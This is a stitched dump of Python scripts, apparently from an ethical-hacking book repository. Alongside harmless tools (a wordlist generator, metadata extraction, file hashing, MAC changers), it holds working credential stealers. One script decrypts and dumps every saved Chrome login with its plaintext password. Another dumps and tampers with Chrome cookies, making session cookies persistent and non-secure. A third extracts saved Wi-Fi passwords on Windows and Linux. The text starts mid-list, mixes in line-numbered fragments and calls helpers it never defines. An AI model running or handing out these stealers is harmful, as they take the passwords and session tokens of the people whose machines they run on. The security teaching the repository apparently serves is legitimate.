eoei 359 | eoeo 360 | eoeu 361 | eoia 362 | eoie 363 | eoii 364 | eoio 365 | eoiu 366 | eooa 367 | eooe 368 | eooi 369 | eooo 370 | eoou 371 | eoua 372 | eoue 373 | eoui 374 | eouo 375 | eouu 376 | euaa 377 | euae 378 | euai 379 | euao 380 | euau 381 | euea 382 | euee 383 | euei 384 | eueo 385 | eueu 386 | euia 387 | euie 388 | euii 389 | euio 390 | euiu 391 | euoa 392 | euoe 393 | euoi 394 | euoo 395 | euou 396 | euua 397 | euue 398 | euui 399 | euuo 400 | euuu 401 | iaaa 402 | iaae 403 | iaai 404 | iaao 405 | iaau 406 | iaea 407 | iaee 408 | iaei 409 | iaeo 410 | iaeu 411 | iaia 412 | iaie 413 | iaii 414 | iaio 415 | iaiu 416 | iaoa 417 | iaoe 418 | iaoi 419 | iaoo 420 | iaou 421 | iaua 422 | iaue 423 | iaui 424 | iauo 425 | iauu 426 | ieaa 427 | ieae 428 | ieai 429 | ieao 430 | ieau 431 | ieea 432 | ieee 433 | ieei 434 | ieeo 435 | ieeu 436 | ieia 437 | ieie 438 | ieii 439 | ieio 440 | ieiu 441 | ieoa 442 | ieoe 443 | ieoi 444 | ieoo 445 | ieou 446 | ieua 447 | ieue 448 | ieui 449 | ieuo 450 | ieuu 451 | iiaa 452 | iiae 453 | iiai 454 | iiao 455 | iiau 456 | iiea 457 | iiee 458 | iiei 459 | iieo 460 | iieu 461 | iiia 462 | iiie 463 | iiii 464 | iiio 465 | iiiu 466 | iioa 467 | iioe 468 | iioi 469 | iioo 470 | iiou 471 | iiua 472 | iiue 473 | iiui 474 | iiuo 475 | iiuu 476 | ioaa 477 | ioae 478 | ioai 479 | ioao 480 | ioau 481 | ioea 482 | ioee 483 | ioei 484 | ioeo 485 | ioeu 486 | ioia 487 | ioie 488 | ioii 489 | ioio 490 | ioiu 491 | iooa 492 | iooe 493 | iooi 494 | iooo 495 | ioou 496 | ioua 497 | ioue 498 | ioui 499 | iouo 500 | iouu 501 | iuaa 502 | iuae 503 | iuai 504 | iuao 505 | iuau 506 | iuea 507 | iuee 508 | iuei 509 | iueo 510 | iueu 511 | iuia 512 | iuie 513 | iuii 514 | iuio 515 | iuiu 516 | iuoa 517 | iuoe 518 | iuoi 519 | iuoo 520 | iuou 521 | iuua 522 | iuue 523 | iuui 524 | iuuo 525 | iuuu 526 | oaaa 527 | oaae 528 | oaai 529 | oaao 530 | oaau 531 | oaea 532 | oaee 533 | oaei 534 | oaeo 535 | oaeu 536 | oaia 537 | oaie 538 | oaii 539 | oaio 540 
| oaiu 541 | oaoa 542 | oaoe 543 | oaoi 544 | oaoo 545 | oaou 546 | oaua 547 | oaue 548 | oaui 549 | oauo 550 | oauu 551 | oeaa 552 | oeae 553 | oeai 554 | oeao 555 | oeau 556 | oeea 557 | oeee 558 | oeei 559 | oeeo 560 | oeeu 561 | oeia 562 | oeie 563 | oeii 564 | oeio 565 | oeiu 566 | oeoa 567 | oeoe 568 | oeoi 569 | oeoo 570 | oeou 571 | oeua 572 | oeue 573 | oeui 574 | oeuo 575 | oeuu 576 | oiaa 577 | oiae 578 | oiai 579 | oiao 580 | oiau 581 | oiea 582 | oiee 583 | oiei 584 | oieo 585 | oieu 586 | oiia 587 | oiie 588 | oiii 589 | oiio 590 | oiiu 591 | oioa 592 | oioe 593 | oioi 594 | oioo 595 | oiou 596 | oiua 597 | oiue 598 | oiui 599 | oiuo 600 | oiuu 601 | ooaa 602 | ooae 603 | ooai 604 | ooao 605 | ooau 606 | ooea 607 | ooee 608 | ooei 609 | ooeo 610 | ooeu 611 | ooia 612 | ooie 613 | ooii 614 | ooio 615 | ooiu 616 | oooa 617 | oooe 618 | oooi 619 | oooo 620 | ooou 621 | ooua 622 | ooue 623 | ooui 624 | oouo 625 | oouu 626 | ouaa 627 | ouae 628 | ouai 629 | ouao 630 | ouau 631 | ouea 632 | ouee 633 | ouei 634 | oueo 635 | oueu 636 | ouia 637 | ouie 638 | ouii 639 | ouio 640 | ouiu 641 | ouoa 642 | ouoe 643 | ouoi 644 | ouoo 645 | ouou 646 | ouua 647 | ouue 648 | ouui 649 | ouuo 650 | ouuu 651 | uaaa 652 | uaae 653 | uaai 654 | uaao 655 | uaau 656 | uaea 657 | uaee 658 | uaei 659 | uaeo 660 | uaeu 661 | uaia 662 | uaie 663 | uaii 664 | uaio 665 | uaiu 666 | uaoa 667 | uaoe 668 | uaoi 669 | uaoo 670 | uaou 671 | uaua 672 | uaue 673 | uaui 674 | uauo 675 | uauu 676 | ueaa 677 | ueae 678 | ueai 679 | ueao 680 | ueau 681 | ueea 682 | ueee 683 | ueei 684 | ueeo 685 | ueeu 686 | ueia 687 | ueie 688 | ueii 689 | ueio 690 | ueiu 691 | ueoa 692 | ueoe 693 | ueoi 694 | ueoo 695 | ueou 696 | ueua 697 | ueue 698 | ueui 699 | ueuo 700 | ueuu 701 | uiaa 702 | uiae 703 | uiai 704 | uiao 705 | uiau 706 | uiea 707 | uiee 708 | uiei 709 | uieo 710 | uieu 711 | uiia 712 | uiie 713 | uiii 714 | uiio 715 | uiiu 716 | uioa 717 | uioe 718 | uioi 719 | uioo 720 | uiou 721 | uiua 
import argparse
import itertools
import string
import time
import sys
from typing import Iterator


class WordlistGenerator:
    """
    A flexible and sophisticated word list generator.

    Words are produced either from a placeholder pattern or from the
    cartesian product of a character set over a range of lengths.
    """

    def __init__(self):
        self.charset = ""        # characters used when no pattern is given
        self.min_length = 1      # minimum word length (pattern-less mode)
        self.max_length = 8      # maximum word length (pattern-less mode)
        self.pattern = None      # placeholder pattern, e.g. "@@%%"
        self.output_file = None  # destination path, or None for stdout

    def generate_wordlist(self) -> Iterator[str]:
        """
        Generate the word list based on the specified parameters.

        Returns:
            Iterator[str]: An iterator of generated words.
        """
        if self.pattern:
            yield from self._generate_with_pattern()
        else:
            yield from self._generate_without_pattern()

    def _generate_with_pattern(self) -> Iterator[str]:
        """
        Generate words based on a specified pattern.

        Placeholders: '@' = lowercase, ',' = uppercase, '%' = digits,
        '^' = punctuation; any other character stands for itself.

        Returns:
            Iterator[str]: An iterator of generated words matching the pattern.
        """
        # Expand each placeholder into its character class; literal
        # characters stay as one-element strings, so itertools.product
        # keeps them fixed in place.
        expansions = {
            '@': string.ascii_lowercase,
            ',': string.ascii_uppercase,
            '%': string.digits,
            '^': string.punctuation,
        }
        pattern_chars = [expansions.get(char, char) for char in self.pattern]
        for word in itertools.product(*pattern_chars):
            yield ''.join(word)

    def _generate_without_pattern(self) -> Iterator[str]:
        """
        Generate every charset combination of length min_length..max_length.

        Returns:
            Iterator[str]: An iterator of generated words.
        """
        for length in range(self.min_length, self.max_length + 1):
            for word in itertools.product(self.charset, repeat=length):
                yield ''.join(word)


def parse_arguments() -> argparse.Namespace:
    """
    Parse command-line arguments.

    Returns:
        argparse.Namespace: Parsed arguments.
    """
    parser = argparse.ArgumentParser(description="Sophisticated Word List Generator")
    parser.add_argument("-c", "--charset", type=str, help="Custom character set")
    parser.add_argument("-m", "--min", type=int, default=1, help="Minimum word length")
    parser.add_argument("-M", "--max", type=int, default=8, help="Maximum word length")
    parser.add_argument("-p", "--pattern", type=str, help="Pattern for word generation")
    parser.add_argument("-o", "--output", type=str, help="Output file")
    parser.add_argument("-l", "--lowercase", action="store_true", help="Include lowercase letters")
    parser.add_argument("-u", "--uppercase", action="store_true", help="Include uppercase letters")
    parser.add_argument("-d", "--digits", action="store_true", help="Include digits")
    parser.add_argument("-s", "--special", action="store_true", help="Include special characters")

    return parser.parse_args()


def main():
    """
    Main function to run the word list generator.
    """
    args = parse_arguments()
    generator = WordlistGenerator()

    # Set up pattern
    generator.pattern = args.pattern
    # Set up character set
    if args.charset:
        generator.charset = args.charset
    else:
        if args.lowercase:
            generator.charset += string.ascii_lowercase
        if args.uppercase:
            generator.charset += string.ascii_uppercase
        if args.digits:
            generator.charset += string.digits
        if args.special:
            generator.charset += string.punctuation

    if not generator.charset and generator.pattern is None:
        print("[!] Error: No character set specified or pattern not provided. Use -h for help.")
        sys.exit(1)

    # Set up other parameters
    generator.min_length = args.min
    generator.max_length = args.max
    generator.output_file = args.output

    # Generate and output words
    output = open(generator.output_file, 'w') if generator.output_file else sys.stdout
    t = time.time()
    # BUG FIX: count words while writing instead of re-reading the whole
    # output file afterwards through a file handle that was never closed.
    n_words = 0
    try:
        for word in generator.generate_wordlist():
            print(word, file=output)
            n_words += 1
    finally:
        if output is not sys.stdout:
            output.close()
        if generator.output_file:
            print(f"[+] Word list saved to {generator.output_file}.")
            print(f"[+] Word list generated in {time.time() - t:.2f} seconds.")
            print(f"[+] Total words generated: {n_words}")


if __name__ == "__main__":
    main()
def get_chrome_datetime(chromedate):
    """Return a `datetime.datetime` object from a chrome format datetime.

    `chromedate` is the number of microseconds since January 1st, 1601.
    The value 86400000000 (and 0/None) is Chrome's "no date" sentinel and
    yields an empty string; on overflow the raw value is returned.
    """
    if chromedate != 86400000000 and chromedate:
        try:
            return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
        except Exception as e:
            print(f"Error: {e}, chromedate: {chromedate}")
            return chromedate
    else:
        return ""


def get_encryption_key():
    """Read Chrome's AES key from the Local State file and DPAPI-decrypt it."""
    local_state_path = os.path.join(os.environ["USERPROFILE"],
                                    "AppData", "Local", "Google", "Chrome",
                                    "User Data", "Local State")
    with open(local_state_path, "r", encoding="utf-8") as f:
        local_state = json.loads(f.read())

    # decode the encryption key from Base64
    key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    # remove 'DPAPI' str (5-byte prefix)
    key = key[5:]
    # return decrypted key that was originally encrypted
    # using a session key derived from current user's logon credentials
    # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]


def decrypt_data(data, key):
    """Decrypt an AES-GCM encrypted cookie value; fall back to DPAPI.

    Returns "" when the blob cannot be decrypted by either scheme.
    """
    try:
        # bytes 3..14 hold the 12-byte GCM nonce; payload follows
        iv = data[3:15]
        payload = data[15:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        # the trailing 16 bytes are the GCM authentication tag
        return cipher.decrypt(payload)[:-16].decode()
    except Exception:
        try:
            # older cookies are protected with DPAPI directly
            return str(win32crypt.CryptUnprotectData(data, None, None, None, 0)[1])
        except Exception:
            # not supported
            return ""


def main(output_file):
    """Dump decrypted Chrome cookies to `output_file` and persist them in the DB copy."""
    # local sqlite Chrome cookie database path
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "Default", "Network", "Cookies")
    # copy the file to current directory
    # as the database will be locked if chrome is currently open
    filename = "Cookies.db"
    if not os.path.isfile(filename):
        # copy file when does not exist in the current directory
        shutil.copyfile(db_path, filename)
    # connect to the database
    db = sqlite3.connect(filename)
    # ignore decoding errors
    db.text_factory = lambda b: b.decode(errors="ignore")
    cursor = db.cursor()
    # get the cookies from `cookies` table
    cursor.execute("""
    SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value
    FROM cookies""")
    # get the AES key
    key = get_encryption_key()
    # BUG FIX: the output file was previously reopened for every row with
    # open(output_file) — read mode — so every print raised
    # io.UnsupportedOperation; open it once for writing instead.
    with open(output_file, "w", encoding="utf-8") as f:
        for host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall():
            if not value:
                decrypted_value = decrypt_data(encrypted_value, key)
            else:
                # already decrypted
                decrypted_value = value
            print(f"""
Host: {host_key}
Cookie name: {name}
Cookie value (decrypted): {decrypted_value}
Creation datetime (UTC): {get_chrome_datetime(creation_utc)}
Last access datetime (UTC): {get_chrome_datetime(last_access_utc)}
Expires datetime (UTC): {get_chrome_datetime(expires_utc)}
===============================================================""", file=f)
            # update the cookies table with the decrypted value
            # and make session cookie persistent
            cursor.execute("""
            UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0
            WHERE host_key = ?
            AND name = ?""", (decrypted_value, host_key, name))
    # commit changes
    db.commit()
    # close connection
    db.close()
    try:
        # try to remove the copied db file
        os.remove(filename)
    except OSError:
        pass


if __name__ == "__main__":
    output_file = sys.argv[1]
    main(output_file)
def main(output_file):
    """Dump decrypted Chrome saved logins (URLs, usernames, passwords, dates) to `output_file`."""
    # get the AES key
    key = get_encryption_key()
    # local sqlite Chrome database path
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default", "Login Data")
    # copy the file to another location
    # as the database will be locked if chrome is currently running
    filename = "ChromeData.db"
    shutil.copyfile(db_path, filename)
    # connect to the database
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    # `logins` table has the data we need
    cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
    # BUG FIX: the output file was previously reopened per row with
    # open(output_file) — read mode — and the date lines were printed after
    # the `with` block had already closed the handle; open it once for
    # writing and keep every print inside its scope.
    with open(output_file, "w", encoding="utf-8") as f:
        # iterate over all rows
        for origin_url, action_url, username, encrypted_password, date_created, date_last_used in cursor.fetchall():
            password = decrypt_password(encrypted_password, key)
            if not (username or password):
                # nothing useful in this row
                continue
            print(f"Origin URL: {origin_url}", file=f)
            print(f"Action URL: {action_url}", file=f)
            print(f"Username: {username}", file=f)
            print(f"Password: {password}", file=f)
            # 86400000000 is Chrome's "no date" sentinel
            if date_created != 86400000000 and date_created:
                print(f"Creation date: {str(get_chrome_datetime(date_created))}", file=f)
            if date_last_used != 86400000000 and date_last_used:
                print(f"Last Used: {str(get_chrome_datetime(date_last_used))}", file=f)
            print("="*50, file=f)
    cursor.close()
    db.close()
    try:
        # try to remove the copied db file
        os.remove(filename)
    except OSError:
        pass


if __name__ == "__main__":
    output_file = sys.argv[1]
    main(output_file)
/chapter-4/extract-metadata-from-files/files/cleaned_example.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/cleaned_example.docx -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/cleaned_example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/cleaned_example.pdf -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/cleaned_image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/cleaned_image.jpg -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/example.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/example.docx -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/example.pdf -------------------------------------------------------------------------------- 
import ffmpeg
from tinytag import TinyTag
import sys
from pprint import pprint  # for printing Python dictionaries in a human-readable way
from PIL import Image
from PIL.ExifTags import TAGS
import pikepdf
from docx import Document


def get_media_metadata(media_file):
    """Return merged ffprobe + TinyTag metadata for an audio/video file as a dict."""
    # uses ffprobe command to extract all possible metadata from the media file
    ffmpeg_data = ffmpeg.probe(media_file)["streams"][0]
    tt_data = TinyTag.get(media_file).as_dict()
    # merge both dicts; ffprobe values win on key collisions
    return {**tt_data, **ffmpeg_data}


def get_image_metadata(image_file):
    """Return basic PIL attributes plus decoded EXIF tags for an image as a dict."""
    # read the image data using PIL
    image = Image.open(image_file)
    # extract other basic metadata
    info_dict = {
        "Filename": image.filename,
        "Image Size": image.size,
        "Image Height": image.height,
        "Image Width": image.width,
        "Image Format": image.format,
        "Image Mode": image.mode,
        "Image is Animated": getattr(image, "is_animated", False),
        "Frames in Image": getattr(image, "n_frames", 1)
    }
    # extract EXIF data
    exifdata = image.getexif()
    # iterating over all EXIF data fields
    for tag_id in exifdata:
        # get the tag name, instead of human unreadable tag id
        tag = TAGS.get(tag_id, tag_id)
        data = exifdata.get(tag_id)
        # decode bytes
        if isinstance(data, bytes):
            data = data.decode()
        info_dict[tag] = data
    return info_dict


def get_pdf_metadata(pdf_file):
    """Return the PDF document-info dictionary (/Author, /Title, ...) as a dict."""
    # BUG FIX: use a context manager so the PDF file handle is closed
    # instead of leaking until interpreter exit.
    with pikepdf.Pdf.open(pdf_file) as pdf:
        # .docinfo attribute contains all the metadata of
        # the PDF document
        return dict(pdf.docinfo)


def get_docx_metadata(docx_file):
    """
    Extracts metadata from a DOCX file.

    Args:
        docx_file (str): The path to the .docx file.

    Returns:
        dict: A dictionary containing metadata information.
    """
    # Load the DOCX file
    doc = Document(docx_file)

    # Accessing document properties
    props = doc.core_properties
    return {
        "author": props.author,
        "category": props.category,
        "comments": props.comments,
        "content_status": props.content_status,
        "created": props.created,
        "identifier": props.identifier,
        "keywords": props.keywords,
        "language": props.language,
        "last_modified_by": props.last_modified_by,
        "last_printed": props.last_printed,
        "modified": props.modified,
        "revision": props.revision,
        "subject": props.subject,
        "title": props.title,
        "version": props.version
    }


if __name__ == "__main__":
    file = sys.argv[1]
    # dispatch on the file extension; anything unrecognized is treated as media
    if file.endswith(".pdf"):
        print(get_pdf_metadata(file))
    elif file.endswith(".jpg"):
        pprint(get_image_metadata(file))
    elif file.endswith(".docx"):
        pprint(get_docx_metadata(file))
    else:
        pprint(get_media_metadata(file))
import subprocess
import os
import re
from collections import namedtuple
import configparser


def get_windows_saved_ssids():
    """Returns a list of saved SSIDs in a Windows machine using the netsh command."""
    # get all saved profiles in the PC
    output = subprocess.check_output("netsh wlan show profiles").decode()
    ssids = []
    profiles = re.findall(r"All User Profile\s(.*)", output)
    for profile in profiles:
        # for each SSID, remove surrounding spaces and the leading colon
        ssid = profile.strip().strip(":").strip()
        ssids.append(ssid)
    return ssids


def get_windows_saved_wifi_passwords(verbose=1):
    """Extracts saved Wi-Fi passwords saved in a Windows machine, this function extracts data using netsh
    command in Windows
    Args:
        verbose (int, optional): whether to print saved profiles real-time. Defaults to 1.
    Returns:
        [list]: list of extracted profiles, a profile has the fields ["ssid", "ciphers", "key"]
    """
    ssids = get_windows_saved_ssids()
    Profile = namedtuple("Profile", ["ssid", "ciphers", "key"])
    profiles = []
    for ssid in ssids:
        # key=clear makes netsh print the password in plain text
        ssid_details = subprocess.check_output(f"""netsh wlan show profile "{ssid}" key=clear""").decode()
        # get the ciphers
        ciphers = re.findall(r"Cipher\s(.*)", ssid_details)
        # clear spaces and colon
        ciphers = "/".join([c.strip().strip(":").strip() for c in ciphers])
        # get the Wi-Fi password
        key = re.findall(r"Key Content\s(.*)", ssid_details)
        try:
            key = key[0].strip().strip(":").strip()
        except IndexError:
            # open networks have no "Key Content" line
            key = "None"
        profile = Profile(ssid=ssid, ciphers=ciphers, key=key)
        if verbose >= 1:
            print_windows_profile(profile)
        profiles.append(profile)
    return profiles


def print_windows_profile(profile):
    """Prints a single profile on Windows"""
    print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")


def print_windows_profiles(verbose):
    """Prints all extracted SSIDs along with Key on Windows"""
    print("SSID                     CIPHER(S)      KEY")
    get_windows_saved_wifi_passwords(verbose)


def get_linux_saved_wifi_passwords(verbose=1):
    """Extracts saved Wi-Fi passwords saved in a Linux machine, this function extracts data in the
    `/etc/NetworkManager/system-connections/` directory
    Args:
        verbose (int, optional): whether to print saved profiles real-time. Defaults to 1.
    Returns:
        [list]: list of extracted profiles, a profile has the fields ["ssid", "auth-alg", "key-mgmt", "psk"]
    """
    network_connections_path = "/etc/NetworkManager/system-connections/"
    fields = ["ssid", "auth-alg", "key-mgmt", "psk"]
    # namedtuple fields cannot contain '-', so normalize to '_'
    Profile = namedtuple("Profile", [f.replace("-", "_") for f in fields])
    profiles = []
    for file in os.listdir(network_connections_path):
        # default every field to None; missing keys stay None
        data = {k.replace("-", "_"): None for k in fields}
        config = configparser.ConfigParser()
        config.read(os.path.join(network_connections_path, file))
        for _, section in config.items():
            for k, v in section.items():
                if k in fields:
                    data[k.replace("-", "_")] = v
        profile = Profile(**data)
        if verbose >= 1:
            print_linux_profile(profile)
        profiles.append(profile)
    return profiles


def print_linux_profile(profile):
    """Prints a single profile on Linux"""
    print(f"{str(profile.ssid):25}{str(profile.auth_alg):5}{str(profile.key_mgmt):10}{str(profile.psk):50}")


def print_linux_profiles(verbose):
    """Prints all extracted SSIDs along with Key (PSK) on Linux"""
    print("SSID                     AUTH KEY-MGMT  PSK")
    get_linux_saved_wifi_passwords(verbose)


def print_profiles(verbose=1):
    """Dispatch to the platform-specific profile printer.

    Raises:
        NotImplementedError: on platforms other than Windows or Linux.
    """
    if os.name == "nt":
        print_windows_profiles(verbose)
    elif os.name == "posix":
        print_linux_profiles(verbose)
    else:
        # NOTE: the original raised `NotImplemented(...)`, which is the binary
        # operator sentinel (not an exception) and fails with a TypeError when
        # called; NotImplementedError is the correct exception type.
        raise NotImplementedError("Code only works for either Linux or Windows")


if __name__ == "__main__":
    print_profiles()
13 | """ 14 | fake = Faker(locale) 15 | user_data = { 16 | "name": fake.name(), 17 | "address": fake.address(), 18 | "email": fake.email(), 19 | "date_of_birth": fake.date_of_birth(), 20 | "company": fake.company(), 21 | "job": fake.job(), 22 | "ssn": fake.ssn(), 23 | "phone_number": fake.phone_number(), 24 | "profile": fake.simple_profile() 25 | } 26 | return user_data 27 | 28 | # Example usage 29 | for _ in range(5): 30 | print("*"*50) 31 | pprint(generate_user_data()) 32 | -------------------------------------------------------------------------------- /chapter-4/fake-data-generation/requirements.txt: -------------------------------------------------------------------------------- 1 | faker -------------------------------------------------------------------------------- /chapter-4/file-integrity/README.md: -------------------------------------------------------------------------------- 1 | $ python verify_file_integrity.py 2 | File integrity verified. 3 | The SHA-256 hash of example.txt is: 9be104294df7d5a59c328241d49ac062e2c7b9660636e7f511e3a1dc3d919377 -------------------------------------------------------------------------------- /chapter-4/file-integrity/example.txt: -------------------------------------------------------------------------------- 1 | This is a text file. -------------------------------------------------------------------------------- /chapter-4/file-integrity/verify_file_integrity.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | def compute_file_hash(file_path): 4 | """ 5 | Computes the SHA-256 hash of a file. 6 | 7 | Args: 8 | file_path (str): The path to the file whose hash is to be computed. 9 | 10 | Returns: 11 | str: The hexadecimal SHA-256 hash of the file. 
12 | """ 13 | sha256_hash = hashlib.sha256() 14 | # Open the file in binary mode to read it 15 | with open(file_path, 'rb') as file: 16 | # Read and update hash string value in blocks of 4K 17 | for byte_block in iter(lambda: file.read(4096), b""): 18 | sha256_hash.update(byte_block) 19 | return sha256_hash.hexdigest() 20 | 21 | 22 | def verify_file_integrity(file_path, original_hash): 23 | """ 24 | Verifies the integrity of a file by comparing its current hash with the original hash. 25 | 26 | Args: 27 | file_path (str): The path to the file to check. 28 | original_hash (str): The original hash of the file for comparison. 29 | 30 | Returns: 31 | bool: True if the file's integrity is confirmed, False otherwise. 32 | """ 33 | current_hash = compute_file_hash(file_path) 34 | return current_hash == original_hash 35 | 36 | # Example usage 37 | # This should be the hash received or computed previously 38 | original_hash = "9be104294df7d5a59c328241d49ac062e2c7b9660636e7f511e3a1dc3d919377" 39 | file_path = 'example.txt' 40 | if verify_file_integrity(file_path, original_hash): 41 | print("File integrity verified.") 42 | else: 43 | print("File integrity compromised!") 44 | 45 | # Example usage 46 | file_path = 'example.txt' 47 | print(f"The SHA-256 hash of {file_path} is: {compute_file_hash(file_path)}") 48 | -------------------------------------------------------------------------------- /chapter-4/mac-address-changer/mac_address_changer_linux.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import string 3 | import random 4 | import re 5 | 6 | 7 | def get_random_mac_address(): 8 | """Generate and return a MAC address in the format of Linux""" 9 | # get the hexdigits uppercased 10 | uppercased_hexdigits = ''.join(set(string.hexdigits.upper())) 11 | # 2nd character must be 0, 2, 4, 6, 8, A, C, or E 12 | mac = "" 13 | for i in range(6): 14 | for j in range(2): 15 | if i == 0: 16 | mac += random.choice("02468ACE") 
17 | else: 18 | mac += random.choice(uppercased_hexdigits) 19 | mac += ":" 20 | return mac.strip(":") 21 | 22 | 23 | def get_current_mac_address(iface): 24 | # use the ifconfig command to get the interface details, including the MAC address 25 | output = subprocess.check_output(f"ifconfig {iface}", shell=True).decode() 26 | return re.search("ether (.+) ", output).group().split()[1].strip() 27 | 28 | 29 | 30 | def change_mac_address(iface, new_mac_address): 31 | # disable the network interface 32 | subprocess.check_output(f"ifconfig {iface} down", shell=True) 33 | # change the MAC 34 | subprocess.check_output(f"ifconfig {iface} hw ether {new_mac_address}", shell=True) 35 | # enable the network interface again 36 | subprocess.check_output(f"ifconfig {iface} up", shell=True) 37 | 38 | 39 | if __name__ == "__main__": 40 | import argparse 41 | parser = argparse.ArgumentParser(description="Python Mac Changer on Linux") 42 | parser.add_argument("interface", help="The network interface name on Linux") 43 | parser.add_argument("-r", "--random", action="store_true", help="Whether to generate a random MAC address") 44 | parser.add_argument("-m", "--mac", help="The new MAC you want to change to") 45 | args = parser.parse_args() 46 | iface = args.interface 47 | if args.random: 48 | # if random parameter is set, generate a random MAC 49 | new_mac_address = get_random_mac_address() 50 | elif args.mac: 51 | # if mac is set, use it instead 52 | new_mac_address = args.mac 53 | # get the current MAC address 54 | old_mac_address = get_current_mac_address(iface) 55 | print("[*] Old MAC address:", old_mac_address) 56 | # change the MAC address 57 | change_mac_address(iface, new_mac_address) 58 | # check if it's really changed 59 | new_mac_address = get_current_mac_address(iface) 60 | print("[+] New MAC address:", new_mac_address) -------------------------------------------------------------------------------- /chapter-4/mac-address-changer/mac_address_changer_windows.py: 
import subprocess
# stdlib `re` fully supports these patterns; the third-party `regex`
# dependency the original imported is unnecessary
import re
import string
import random

# the registry path of network interfaces
network_interface_reg_path = r"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}"
# the transport name regular expression, looks like {AF1B45DB-B5D4-46D0-B4EA-3E18FA49BF5F}
transport_name_regex = re.compile("{.+}")
# the MAC address regular expression
mac_address_regex = re.compile(r"([A-Z0-9]{2}[:-]){5}([A-Z0-9]{2})")

def get_random_mac_address():
    """Generate and return a 12-hex-digit MAC address in the format Windows expects (no separators)."""
    # the set() pass de-duplicates hexdigits after uppercasing
    uppercased_hexdigits = ''.join(set(string.hexdigits.upper()))
    # 2nd character must be 2, 4, A, or E (locally administered, unicast)
    return random.choice(uppercased_hexdigits) + random.choice("24AE") + "".join(random.sample(uppercased_hexdigits, k=10))


def clean_mac(mac):
    """Simple function to clean non hexadecimal characters from a MAC address
    mostly used to remove '-' and ':' from MAC addresses and also uppercase it"""
    return "".join(c for c in mac if c in string.hexdigits).upper()


def get_connected_adapters_mac_address():
    """Return [(mac, transport_name), ...] for every connected adapter, parsed from `getmac` output."""
    connected_adapters_mac = []
    # use the getmac command to extract adapter info
    for potential_mac in subprocess.check_output("getmac").decode().splitlines():
        # parse the MAC address from the line
        mac_address = mac_address_regex.search(potential_mac)
        # parse the transport name from the line
        transport_name = transport_name_regex.search(potential_mac)
        if mac_address and transport_name:
            # both found on the same line -> this is an adapter row
            connected_adapters_mac.append((mac_address.group(), transport_name.group()))
    return connected_adapters_mac


def get_user_adapter_choice(connected_adapters_mac):
    """Prompt the user to pick an adapter; auto-select when only one exists."""
    if not connected_adapters_mac:
        # the original indexed [0] here and crashed with IndexError
        print("No connected adapters found, quitting...")
        exit()
    # print the available adapters
    for i, option in enumerate(connected_adapters_mac):
        print(f"#{i}: {option[0]}, {option[1]}")
    if len(connected_adapters_mac) == 1:
        # when there is only one adapter, choose it immediately
        return connected_adapters_mac[0]
    # prompt the user to choose a network adapter index
    try:
        choice = int(input("Please choose the interface you want to change the MAC address:"))
        # return the chosen adapter's MAC and transport name; the transport
        # name is used later to find the adapter via `reg QUERY`
        return connected_adapters_mac[choice]
    except (ValueError, IndexError):
        # non-numeric input or out-of-range index: quit the script
        print("Not a valid choice, quitting...")
        exit()


def change_mac_address(adapter_transport_name, new_mac_address):
    """Write `new_mac_address` into the registry entry of the adapter whose
    transport name matches, and return that adapter's index (or None if not found)."""
    # use reg QUERY command to get available adapters from the registry
    output = subprocess.check_output(f"reg QUERY " + network_interface_reg_path.replace("\\\\", "\\")).decode()
    adapter_index = None
    for interface in re.findall(rf"{network_interface_reg_path}\\\d+", output):
        # the trailing number of the registry key is the adapter index
        index = int(interface.split("\\")[-1])
        interface_content = subprocess.check_output(f"reg QUERY {interface.strip()}").decode()
        if adapter_transport_name in interface_content:
            # this registry key belongs to the adapter we're looking for;
            # change the MAC address using reg ADD command
            changing_mac_output = subprocess.check_output(f"reg add {interface} /v NetworkAddress /d {new_mac_address} /f").decode()
            print(changing_mac_output)
            adapter_index = index
            break
    # None means no adapter matched (the original returned a stale/unbound index)
    return adapter_index


def disable_adapter(adapter_index):
    """Disable the adapter via wmic so the MAC address change is reflected."""
    disable_output = subprocess.check_output(f"wmic path win32_networkadapter where index={adapter_index} call disable").decode()
    return disable_output


def enable_adapter(adapter_index):
    """Enable the adapter via wmic so the MAC address change is reflected."""
    enable_output = subprocess.check_output(f"wmic path win32_networkadapter where index={adapter_index} call enable").decode()
    return enable_output


if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Python Windows MAC changer")
